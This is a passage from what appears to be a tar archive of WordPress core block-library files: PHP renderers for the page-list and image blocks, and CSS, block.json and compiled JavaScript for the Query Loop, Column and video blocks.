				$markup .= '<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12" fill="none" aria-hidden="true" focusable="false"><path d="M1.50002 4L6.00002 8L10.5 4" stroke-width="1.5"></path></svg>';
				$markup .= '</button>';
			}
			$markup .= '<ul class="wp-block-navigation__submenu-container">';
			$markup .= block_core_page_list_render_nested_page_list( $open_submenus_on_click, $show_submenu_icons, $is_navigation_child, $page['children'], $is_nested, $active_page_ancestor_ids, $colors, $depth + 1 );
			$markup .= '</ul>';
		}
		$markup .= '</li>';
	}
	return $markup;
}

/**
 * Outputs nested array of pages
 *
 * @since 5.8.0
 *
 * @param array $current_level The level being iterated through.
 * @param array $children The children grouped by parent post ID.
 *
 * @return array The nested array of pages.
 */
function block_core_page_list_nest_pages( $current_level, $children ) {
	if ( empty( $current_level ) ) {
		return;
	}
	foreach ( (array) $current_level as $key => $current ) {
		if ( isset( $children[ $key ] ) ) {
			$current_level[ $key ]['children'] = block_core_page_list_nest_pages( $children[ $key ], $children );
		}
	}
	return $current_level;
}

/**
 * Renders the `core/page-list` block on server.
 *
 * @since 5.8.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The saved content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string Returns the page list markup.
 */
function render_block_core_page_list( $attributes, $content, $block ) {
	static $block_id = 0;
	++$block_id;

	$parent_page_id = $attributes['parentPageID'];
	$is_nested      = $attributes['isNested'];

	$all_pages = get_pages(
		array(
			'sort_column' => 'menu_order,post_title',
			'order'       => 'asc',
		)
	);

	// If there are no pages, there is nothing to show.
	if ( empty( $all_pages ) ) {
		return;
	}

	$top_level_pages = array();

	$pages_with_children = array();

	$active_page_ancestor_ids = array();

	foreach ( (array) $all_pages as $page ) {
		$is_active = ! empty( $page->ID ) && ( get_queried_object_id() === $page->ID );

		if ( $is_active ) {
			$active_page_ancestor_ids = get_post_ancestors( $page->ID );
		}

		if ( $page->post_parent ) {
			$pages_with_children[ $page->post_parent ][ $page->ID ] = array(
				'page_id'   => $page->ID,
				'title'     => $page->post_title,
				'link'      => get_permalink( $page ),
				'is_active' => $is_active,
			);
		} else {
			$top_level_pages[ $page->ID ] = array(
				'page_id'   => $page->ID,
				'title'     => $page->post_title,
				'link'      => get_permalink( $page ),
				'is_active' => $is_active,
			);

		}
	}

	$colors          = block_core_page_list_build_css_colors( $attributes, $block->context );
	$font_sizes      = block_core_page_list_build_css_font_sizes( $block->context );
	$classes         = array_merge(
		$colors['css_classes'],
		$font_sizes['css_classes']
	);
	$style_attribute = ( $colors['inline_styles'] . $font_sizes['inline_styles'] );
	$css_classes     = trim( implode( ' ', $classes ) );

	$nested_pages = block_core_page_list_nest_pages( $top_level_pages, $pages_with_children );

	if ( 0 !== $parent_page_id ) {
		// If the parent page has no child pages, there is nothing to show.
		if ( ! array_key_exists( $parent_page_id, $pages_with_children ) ) {
			return;
		}

		$nested_pages = block_core_page_list_nest_pages(
			$pages_with_children[ $parent_page_id ],
			$pages_with_children
		);
	}

	$is_navigation_child = array_key_exists( 'showSubmenuIcon', $block->context );

	$open_submenus_on_click = array_key_exists( 'openSubmenusOnClick', $block->context ) ? $block->context['openSubmenusOnClick'] : false;

	$show_submenu_icons = array_key_exists( 'showSubmenuIcon', $block->context ) ? $block->context['showSubmenuIcon'] : false;

	$wrapper_markup = $is_nested ? '%2$s' : '<ul %1$s>%2$s</ul>';

	$items_markup = block_core_page_list_render_nested_page_list( $open_submenus_on_click, $show_submenu_icons, $is_navigation_child, $nested_pages, $is_nested, $active_page_ancestor_ids, $colors );

	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'class' => $css_classes,
			'style' => $style_attribute,
		)
	);

	return sprintf(
		$wrapper_markup,
		$wrapper_attributes,
		$items_markup
	);
}

/**
 * Registers the `core/pages` block on server.
 *
 * @since 5.8.0
 */
function register_block_core_page_list() {
	register_block_type_from_metadata(
		__DIR__ . '/page-list',
		array(
			'render_callback' => 'render_block_core_page_list',
		)
	);
}
add_action( 'init', 'register_block_core_page_list' );
image.php000060400000027555151330427370006356 0ustar00<?php
/**
 * Server-side rendering of the `core/image` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/image` block on the server,
 * adding a data-id attribute to the element if core/gallery has added on pre-render.
 *
 * @since 5.9.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The block content.
 * @param WP_Block $block      The block object.
 *
 * @return string The block content with the data-id attribute added.
 */
function render_block_core_image( $attributes, $content, $block ) {
	if ( false === stripos( $content, '<img' ) ) {
		return '';
	}

	$p = new WP_HTML_Tag_Processor( $content );

	if ( ! $p->next_tag( 'img' ) || null === $p->get_attribute( 'src' ) ) {
		return '';
	}

	$has_id_binding = isset( $attributes['metadata']['bindings']['id'] ) && isset( $attributes['id'] );

	// Ensure the `wp-image-id` classname on the image block supports block bindings.
	if ( $has_id_binding ) {
		// If there's a mismatch with the 'wp-image-' class and the actual id, the id was
		// probably overridden by block bindings. Update it to the correct value.
		// See https://github.com/WordPress/gutenberg/issues/62886 for why this is needed.
		$id                       = $attributes['id'];
		$image_classnames         = $p->get_attribute( 'class' );
		$class_with_binding_value = "wp-image-$id";
		if ( is_string( $image_classnames ) && ! str_contains( $image_classnames, $class_with_binding_value ) ) {
			$image_classnames = preg_replace( '/wp-image-(\d+)/', $class_with_binding_value, $image_classnames );
			$p->set_attribute( 'class', $image_classnames );
		}
	}

	// For backwards compatibility, the data-id html attribute is only set for
	// image blocks nested in a gallery. Detect if the image is in a gallery by
	// checking the data-id attribute.
	// See the `block_core_gallery_data_id_backcompatibility` function.
	if ( isset( $attributes['data-id'] ) ) {
		// If there's a binding for the `id`, the `id` attribute is used for the
		// value, since `data-id` does not support block bindings.
		// Else the `data-id` is used for backwards compatibility, since
		// third parties may be filtering its value.
		$data_id = $has_id_binding ? $attributes['id'] : $attributes['data-id'];
		$p->set_attribute( 'data-id', $data_id );
	}

	$link_destination  = isset( $attributes['linkDestination'] ) ? $attributes['linkDestination'] : 'none';
	$lightbox_settings = block_core_image_get_lightbox_settings( $block->parsed_block );

	/*
	 * If the lightbox is enabled and the image is not linked, adds the filter and
	 * the JavaScript view file.
	 */
	if (
		isset( $lightbox_settings ) &&
		'none' === $link_destination &&
		isset( $lightbox_settings['enabled'] ) &&
		true === $lightbox_settings['enabled']
	) {
		$suffix = wp_scripts_get_suffix();
		if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN ) {
			$module_url = gutenberg_url( '/build/interactivity/image.min.js' );
		}

		wp_register_script_module(
			'@wordpress/block-library/image',
			isset( $module_url ) ? $module_url : includes_url( "blocks/image/view{$suffix}.js" ),
			array( '@wordpress/interactivity' ),
			defined( 'GUTENBERG_VERSION' ) ? GUTENBERG_VERSION : get_bloginfo( 'version' )
		);

		wp_enqueue_script_module( '@wordpress/block-library/image' );

		/*
		 * This render needs to happen in a filter with priority 15 to ensure that
		 * it runs after the duotone filter and that duotone styles are applied to
		 * the image in the lightbox. Lightbox has to work with any plugins that
		 * might use filters as well. Removing this can be considered in the future
		 * if the way the blocks are rendered changes, or if a new kind of filter is
		 * introduced.
		 */
		add_filter( 'render_block_core/image', 'block_core_image_render_lightbox', 15, 2 );
	} else {
		/*
		 * Remove the filter if previously added by other Image blocks.
		 */
		remove_filter( 'render_block_core/image', 'block_core_image_render_lightbox', 15 );
	}

	return $p->get_updated_html();
}

/**
 * Adds the lightboxEnabled flag to the block data.
 *
 * This is used to determine whether the lightbox should be rendered or not.
 *
 * @since 6.4.0
 *
 * @param array $block Block data.
 *
 * @return array Filtered block data.
 */
function block_core_image_get_lightbox_settings( $block ) {
	// Gets the lightbox setting from the block attributes.
	if ( isset( $block['attrs']['lightbox'] ) ) {
		$lightbox_settings = $block['attrs']['lightbox'];
	}

	if ( ! isset( $lightbox_settings ) ) {
		$lightbox_settings = wp_get_global_settings( array( 'lightbox' ), array( 'block_name' => 'core/image' ) );

		// If not present in global settings, check the top-level global settings.
		//
		// NOTE: If no block-level settings are found, the previous call to
		// `wp_get_global_settings` will return the whole `theme.json` structure in
		// which case we can check if the "lightbox" key is present at the top-level
		// of the global settings and use its value.
		if ( isset( $lightbox_settings['lightbox'] ) ) {
			$lightbox_settings = wp_get_global_settings( array( 'lightbox' ) );
		}
	}

	return $lightbox_settings ?? null;
}

/**
 * Adds the directives and layout needed for the lightbox behavior.
 *
 * @since 6.4.0
 *
 * @param string $block_content Rendered block content.
 * @param array  $block         Block object.
 *
 * @return string Filtered block content.
 */
function block_core_image_render_lightbox( $block_content, $block ) {
	/*
	 * If there's no IMG tag in the block then return the given block content
	 * as-is. There's nothing that this code can knowingly modify to add the
	 * lightbox behavior.
	 */
	$p = new WP_HTML_Tag_Processor( $block_content );
	if ( $p->next_tag( 'figure' ) ) {
		$p->set_bookmark( 'figure' );
	}
	if ( ! $p->next_tag( 'img' ) ) {
		return $block_content;
	}

	$alt              = $p->get_attribute( 'alt' );
	$img_uploaded_src = $p->get_attribute( 'src' );
	$img_class_names  = $p->get_attribute( 'class' );
	$img_styles       = $p->get_attribute( 'style' );
	$img_width        = 'none';
	$img_height       = 'none';
	$aria_label       = __( 'Enlarge image' );

	if ( $alt ) {
		/* translators: %s: Image alt text. */
		$aria_label = sprintf( __( 'Enlarge image: %s' ), $alt );
	}

	if ( isset( $block['attrs']['id'] ) ) {
		$img_uploaded_src = wp_get_attachment_url( $block['attrs']['id'] );
		$img_metadata     = wp_get_attachment_metadata( $block['attrs']['id'] );
		$img_width        = $img_metadata['width'] ?? 'none';
		$img_height       = $img_metadata['height'] ?? 'none';
	}

	// Figure.
	$p->seek( 'figure' );
	$figure_class_names = $p->get_attribute( 'class' );
	$figure_styles      = $p->get_attribute( 'style' );
	$p->add_class( 'wp-lightbox-container' );
	$p->set_attribute( 'data-wp-interactive', 'core/image' );
	$p->set_attribute(
		'data-wp-context',
		wp_json_encode(
			array(
				'uploadedSrc'      => $img_uploaded_src,
				'figureClassNames' => $figure_class_names,
				'figureStyles'     => $figure_styles,
				'imgClassNames'    => $img_class_names,
				'imgStyles'        => $img_styles,
				'targetWidth'      => $img_width,
				'targetHeight'     => $img_height,
				'scaleAttr'        => $block['attrs']['scale'] ?? false,
				'ariaLabel'        => $aria_label,
				'alt'              => $alt,
			),
			JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
		)
	);

	// Image.
	$p->next_tag( 'img' );
	$p->set_attribute( 'data-wp-init', 'callbacks.setButtonStyles' );
	$p->set_attribute( 'data-wp-on-async--load', 'callbacks.setButtonStyles' );
	$p->set_attribute( 'data-wp-on-async-window--resize', 'callbacks.setButtonStyles' );
	// Sets an event callback on the `img` because the `figure` element can also
	// contain a caption, and we don't want to trigger the lightbox when the
	// caption is clicked.
	$p->set_attribute( 'data-wp-on-async--click', 'actions.showLightbox' );

	$body_content = $p->get_updated_html();

	// Adds a button alongside image in the body content.
	$img = null;
	preg_match( '/<img[^>]+>/', $body_content, $img );

	$button =
		$img[0]
		. '<button
			class="lightbox-trigger"
			type="button"
			aria-haspopup="dialog"
			aria-label="' . esc_attr( $aria_label ) . '"
			data-wp-init="callbacks.initTriggerButton"
			data-wp-on-async--click="actions.showLightbox"
			data-wp-style--right="context.imageButtonRight"
			data-wp-style--top="context.imageButtonTop"
		>
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewBox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z" />
			</svg>
		</button>';

	$body_content = preg_replace( '/<img[^>]+>/', $button, $body_content );

	add_action( 'wp_footer', 'block_core_image_print_lightbox_overlay' );

	return $body_content;
}

/**
 * @since 6.5.0
 */
function block_core_image_print_lightbox_overlay() {
	$close_button_label = esc_attr__( 'Close' );

	// If the current theme does NOT have a `theme.json`, or the colors are not
	// defined, it needs to set the background color & close button color to some
	// default values because it can't get them from the Global Styles.
	$background_color   = '#fff';
	$close_button_color = '#000';
	if ( wp_theme_has_theme_json() ) {
		$global_styles_color = wp_get_global_styles( array( 'color' ) );
		if ( ! empty( $global_styles_color['background'] ) ) {
			$background_color = esc_attr( $global_styles_color['background'] );
		}
		if ( ! empty( $global_styles_color['text'] ) ) {
			$close_button_color = esc_attr( $global_styles_color['text'] );
		}
	}

	echo <<<HTML
		<div
			class="wp-lightbox-overlay zoom"
			data-wp-interactive="core/image"
			data-wp-context='{}'
			data-wp-bind--role="state.roleAttribute"
			data-wp-bind--aria-label="state.currentImage.ariaLabel"
			data-wp-bind--aria-modal="state.ariaModal"
			data-wp-class--active="state.overlayEnabled"
			data-wp-class--show-closing-animation="state.showClosingAnimation"
			data-wp-watch="callbacks.setOverlayFocus"
			data-wp-on--keydown="actions.handleKeydown"
			data-wp-on-async--touchstart="actions.handleTouchStart"
			data-wp-on--touchmove="actions.handleTouchMove"
			data-wp-on-async--touchend="actions.handleTouchEnd"
			data-wp-on-async--click="actions.hideLightbox"
			data-wp-on-async-window--resize="callbacks.setOverlayStyles"
			data-wp-on-async-window--scroll="actions.handleScroll"
			tabindex="-1"
			>
				<button type="button" aria-label="$close_button_label" style="fill: $close_button_color" class="close-button">
					<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="20" height="20" aria-hidden="true" focusable="false"><path d="M13 11.8l6.1-6.3-1-1-6.1 6.2-6.1-6.2-1 1 6.1 6.3-6.5 6.7 1 1 6.5-6.6 6.5 6.6 1-1z"></path></svg>
				</button>
				<div class="lightbox-image-container">
					<figure data-wp-bind--class="state.currentImage.figureClassNames" data-wp-bind--style="state.currentImage.figureStyles">
						<img data-wp-bind--alt="state.currentImage.alt" data-wp-bind--class="state.currentImage.imgClassNames" data-wp-bind--style="state.imgStyles" data-wp-bind--src="state.currentImage.currentSrc">
					</figure>
				</div>
				<div class="lightbox-image-container">
					<figure data-wp-bind--class="state.currentImage.figureClassNames" data-wp-bind--style="state.currentImage.figureStyles">
						<img data-wp-bind--alt="state.currentImage.alt" data-wp-bind--class="state.currentImage.imgClassNames" data-wp-bind--style="state.imgStyles" data-wp-bind--src="state.enlargedSrc">
					</figure>
				</div>
				<div class="scrim" style="background-color: $background_color" aria-hidden="true"></div>
				<style data-wp-text="state.overlayStyles"></style>
		</div>
HTML;
}

/**
 * Registers the `core/image` block on server.
 *
 * @since 5.9.0
 */
function register_block_core_image() {
	register_block_type_from_metadata(
		__DIR__ . '/image',
		array(
			'render_callback' => 'render_block_core_image',
		)
	);
}
add_action( 'init', 'register_block_core_image' );
query/editor.min.css000060400000003017151330427370010475 0ustar00.block-library-query-toolbar__popover .components-popover__content{min-width:230px}.wp-block-query__create-new-link{padding:0 16px 16px 52px}.block-library-query__pattern-selection-content .block-editor-block-patterns-list{display:grid;grid-template-columns:1fr 1fr 1fr;grid-gap:8px}.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{margin-bottom:0}.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{max-height:250px}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:1280px){.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:3}}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{background:#fff;margin-bottom:-4px;padding:16px 0;position:sticky;top:0;transform:translateY(-4px);z-index:2}.block-library-query-toolspanel__filters .components-form-token-field__help{margin-bottom:0}.block-library-query-toolspanel__filters .block-library-query-inspector__taxonomy-control:not(:last-child){margin-bottom:24px}@media (min-width:600px){.wp-block-query__enhanced-pagination-modal{max-width:480px}}.wp-block-query__enhanced-pagination-notice{margin:0}query/block.json000060400000002206151330427370007677 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query",
	"title": "Query Loop",
	"category": "theme",
	"description": "An advanced block that allows displaying post types based on different query parameters and visual configurations.",
	"textdomain": "default",
	"attributes": {
		"queryId": {
			"type": "number"
		},
		"query": {
			"type": "object",
			"default": {
				"perPage": null,
				"pages": 0,
				"offset": 0,
				"postType": "post",
				"order": "desc",
				"orderBy": "date",
				"author": "",
				"search": "",
				"exclude": [],
				"sticky": "",
				"inherit": true,
				"taxQuery": null,
				"parents": []
			}
		},
		"tagName": {
			"type": "string",
			"default": "div"
		},
		"namespace": {
			"type": "string"
		},
		"enhancedPagination": {
			"type": "boolean",
			"default": false
		}
	},
	"providesContext": {
		"queryId": "queryId",
		"query": "query",
		"displayLayout": "displayLayout",
		"enhancedPagination": "enhancedPagination"
	},
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"layout": true,
		"interactivity": true
	},
	"editorStyle": "wp-block-query-editor"
}
query/view.js000060400000011305151330427370007222 0ustar00import * as __WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__ from "@wordpress/interactivity";
/******/ var __webpack_modules__ = ({

/***/ 438:
/***/ ((module) => {

module.exports = import("@wordpress/interactivity-router");;

/***/ })

/******/ });
/************************************************************************/
/******/ // The module cache
/******/ var __webpack_module_cache__ = {};
/******/ 
/******/ // The require function
/******/ function __webpack_require__(moduleId) {
/******/ 	// Check if module is in cache
/******/ 	var cachedModule = __webpack_module_cache__[moduleId];
/******/ 	if (cachedModule !== undefined) {
/******/ 		return cachedModule.exports;
/******/ 	}
/******/ 	// Create a new module (and put it into the cache)
/******/ 	var module = __webpack_module_cache__[moduleId] = {
/******/ 		// no module.id needed
/******/ 		// no module.loaded needed
/******/ 		exports: {}
/******/ 	};
/******/ 
/******/ 	// Execute the module function
/******/ 	__webpack_modules__[moduleId](module, module.exports, __webpack_require__);
/******/ 
/******/ 	// Return the exports of the module
/******/ 	return module.exports;
/******/ }
/******/ 
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ 	// define getter functions for harmony exports
/******/ 	__webpack_require__.d = (exports, definition) => {
/******/ 		for(var key in definition) {
/******/ 			if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ 				Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ 			}
/******/ 		}
/******/ 	};
/******/ })();
/******/ 
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ 	__webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/ 
/************************************************************************/
var __webpack_exports__ = {};
// This entry need to be wrapped in an IIFE because it need to be isolated against other modules in the chunk.
(() => {

;// CONCATENATED MODULE: external "@wordpress/interactivity"
var x = (y) => {
	var x = {}; __webpack_require__.d(x, y); return x
} 
var y = (x) => (() => (x))
const interactivity_namespaceObject = x({ ["getContext"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getContext), ["getElement"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getElement), ["store"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.store) });
;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/query/view.js
/**
 * WordPress dependencies
 */

const isValidLink = ref => ref && ref instanceof window.HTMLAnchorElement && ref.href && (!ref.target || ref.target === '_self') && ref.origin === window.location.origin;
const isValidEvent = event => event.button === 0 &&
// Left clicks only.
!event.metaKey &&
// Open in new tab (Mac).
!event.ctrlKey &&
// Open in new tab (Windows).
!event.altKey &&
// Download.
!event.shiftKey && !event.defaultPrevented;
(0,interactivity_namespaceObject.store)('core/query', {
  actions: {
    *navigate(event) {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      const queryRef = ref.closest('.wp-block-query[data-wp-router-region]');
      if (isValidLink(ref) && isValidEvent(event)) {
        event.preventDefault();
        const {
          actions
        } = yield Promise.resolve(/* import() */).then(__webpack_require__.bind(__webpack_require__, 438));
        yield actions.navigate(ref.href);
        ctx.url = ref.href;

        // Focus the first anchor of the Query block.
        const firstAnchor = `.wp-block-post-template a[href]`;
        queryRef.querySelector(firstAnchor)?.focus();
      }
    },
    *prefetch() {
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      if (isValidLink(ref)) {
        const {
          actions
        } = yield Promise.resolve(/* import() */).then(__webpack_require__.bind(__webpack_require__, 438));
        yield actions.prefetch(ref.href);
      }
    }
  },
  callbacks: {
    *prefetch() {
      const {
        url
      } = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      if (url && isValidLink(ref)) {
        const {
          actions
        } = yield Promise.resolve(/* import() */).then(__webpack_require__.bind(__webpack_require__, 438));
        yield actions.prefetch(ref.href);
      }
    }
  }
}, {
  lock: true
});

})();

query/editor-rtl.min.css000060400000003017151330427370011274 0ustar00.block-library-query-toolbar__popover .components-popover__content{min-width:230px}.wp-block-query__create-new-link{padding:0 52px 16px 16px}.block-library-query__pattern-selection-content .block-editor-block-patterns-list{display:grid;grid-template-columns:1fr 1fr 1fr;grid-gap:8px}.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{margin-bottom:0}.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{max-height:250px}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:1280px){.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:3}}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{background:#fff;margin-bottom:-4px;padding:16px 0;position:sticky;top:0;transform:translateY(-4px);z-index:2}.block-library-query-toolspanel__filters .components-form-token-field__help{margin-bottom:0}.block-library-query-toolspanel__filters .block-library-query-inspector__taxonomy-control:not(:last-child){margin-bottom:24px}@media (min-width:600px){.wp-block-query__enhanced-pagination-modal{max-width:480px}}.wp-block-query__enhanced-pagination-notice{margin:0}query/editor-rtl.css000060400000003215151330427370010512 0ustar00.block-library-query-toolbar__popover .components-popover__content{
  min-width:230px;
}

.wp-block-query__create-new-link{
  padding:0 52px 16px 16px;
}

.block-library-query__pattern-selection-content .block-editor-block-patterns-list{
  display:grid;
  grid-template-columns:1fr 1fr 1fr;
  grid-gap:8px;
}
.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{
  margin-bottom:0;
}
.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{
  max-height:250px;
}

.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{
  column-count:2;
  column-gap:24px;
}
@media (min-width:1280px){
  .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{
    column-count:3;
  }
}
.block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{
  break-inside:avoid-column;
}
.block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{
  background:#fff;
  margin-bottom:-4px;
  padding:16px 0;
  position:sticky;
  top:0;
  transform:translateY(-4px);
  z-index:2;
}

.block-library-query-toolspanel__filters .components-form-token-field__help{
  margin-bottom:0;
}
.block-library-query-toolspanel__filters .block-library-query-inspector__taxonomy-control:not(:last-child){
  margin-bottom:24px;
}

@media (min-width:600px){
  .wp-block-query__enhanced-pagination-modal{
    max-width:480px;
  }
}

.wp-block-query__enhanced-pagination-notice{
  margin:0;
}query/editor.css000060400000003215151330427370007713 0ustar00.block-library-query-toolbar__popover .components-popover__content{
  min-width:230px;
}

.wp-block-query__create-new-link{
  padding:0 16px 16px 52px;
}

.block-library-query__pattern-selection-content .block-editor-block-patterns-list{
  display:grid;
  grid-template-columns:1fr 1fr 1fr;
  grid-gap:8px;
}
.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{
  margin-bottom:0;
}
.block-library-query__pattern-selection-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{
  max-height:250px;
}

.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{
  column-count:2;
  column-gap:24px;
}
@media (min-width:1280px){
  .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{
    column-count:3;
  }
}
.block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{
  break-inside:avoid-column;
}
.block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{
  background:#fff;
  margin-bottom:-4px;
  padding:16px 0;
  position:sticky;
  top:0;
  transform:translateY(-4px);
  z-index:2;
}

.block-library-query-toolspanel__filters .components-form-token-field__help{
  margin-bottom:0;
}
.block-library-query-toolspanel__filters .block-library-query-inspector__taxonomy-control:not(:last-child){
  margin-bottom:24px;
}

@media (min-width:600px){
  .wp-block-query__enhanced-pagination-modal{
    max-width:480px;
  }
}

.wp-block-query__enhanced-pagination-notice{
  margin:0;
}query/view.min.js000060400000002614151330427370010007 0ustar00import*as e from"@wordpress/interactivity";var t={438:e=>{e.exports=import("@wordpress/interactivity-router")}},r={};function o(e){var n=r[e];if(void 0!==n)return n.exports;var i=r[e]={exports:{}};return t[e](i,i.exports,o),i.exports}o.d=(e,t)=>{for(var r in t)o.o(t,r)&&!o.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},o.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{const t=(e=>{var t={};return o.d(t,e),t})({getContext:()=>e.getContext,getElement:()=>e.getElement,store:()=>e.store}),r=e=>e&&e instanceof window.HTMLAnchorElement&&e.href&&(!e.target||"_self"===e.target)&&e.origin===window.location.origin;(0,t.store)("core/query",{actions:{*navigate(e){const n=(0,t.getContext)(),{ref:i}=(0,t.getElement)(),s=i.closest(".wp-block-query[data-wp-router-region]");if(r(i)&&(e=>!(0!==e.button||e.metaKey||e.ctrlKey||e.altKey||e.shiftKey||e.defaultPrevented))(e)){e.preventDefault();const{actions:t}=yield Promise.resolve().then(o.bind(o,438));yield t.navigate(i.href),n.url=i.href;const r=".wp-block-post-template a[href]";s.querySelector(r)?.focus()}},*prefetch(){const{ref:e}=(0,t.getElement)();if(r(e)){const{actions:t}=yield Promise.resolve().then(o.bind(o,438));yield t.prefetch(e.href)}}},callbacks:{*prefetch(){const{url:e}=(0,t.getContext)(),{ref:n}=(0,t.getElement)();if(e&&r(n)){const{actions:e}=yield Promise.resolve().then(o.bind(o,438));yield e.prefetch(n.href)}}}},{lock:!0})})();query/view.min.asset.php000060400000000124151330427370011272 0ustar00<?php return array('dependencies' => array(), 'version' => '490915f92cc794ea16e1');
query/view.asset.php000060400000000124151330427370010510 0ustar00<?php return array('dependencies' => array(), 'version' => 'ee101e08820687c9c07f');
column/block.json000060400000003075151330427370010034 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/column",
	"title": "Column",
	"category": "design",
	"parent": [ "core/columns" ],
	"description": "A single column within a columns block.",
	"textdomain": "default",
	"attributes": {
		"verticalAlignment": {
			"type": "string"
		},
		"width": {
			"type": "string"
		},
		"allowedBlocks": {
			"type": "array"
		},
		"templateLock": {
			"type": [ "string", "boolean" ],
			"enum": [ "all", "insert", "contentOnly", false ]
		}
	},
	"supports": {
		"__experimentalOnEnter": true,
		"anchor": true,
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"heading": true,
			"button": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"shadow": true,
		"spacing": {
			"blockGap": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"padding": true,
				"blockGap": true
			}
		},
		"__experimentalBorder": {
			"color": true,
			"style": true,
			"width": true,
			"__experimentalDefaultControls": {
				"color": true,
				"style": true,
				"width": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"layout": true,
		"interactivity": {
			"clientNavigation": true
		}
	}
}
video/editor.css000060400000003724151330427370007661 0ustar00.wp-block-video.wp-block-video.is-selected .components-placeholder{
  background-color:#fff;
  border:none;
  border-radius:2px;
  box-shadow:inset 0 0 0 1px #1e1e1e;
  color:#1e1e1e;
}
.wp-block-video.wp-block-video.is-selected .components-placeholder>svg{
  opacity:0;
}
.wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{
  display:none;
}
.wp-block-video.wp-block-video.is-selected .components-placeholder:before{
  opacity:0;
}
.wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{
  transition:none;
}

.wp-block[data-align=center]>.wp-block-video{
  text-align:center;
}

.wp-block-video{
  position:relative;
}
.wp-block-video.is-transient video{
  opacity:.3;
}
.wp-block-video .components-spinner{
  left:50%;
  margin-left:-9px;
  margin-top:-9px;
  position:absolute;
  top:50%;
}

.editor-video-poster-control .components-base-control__label{
  display:block;
}
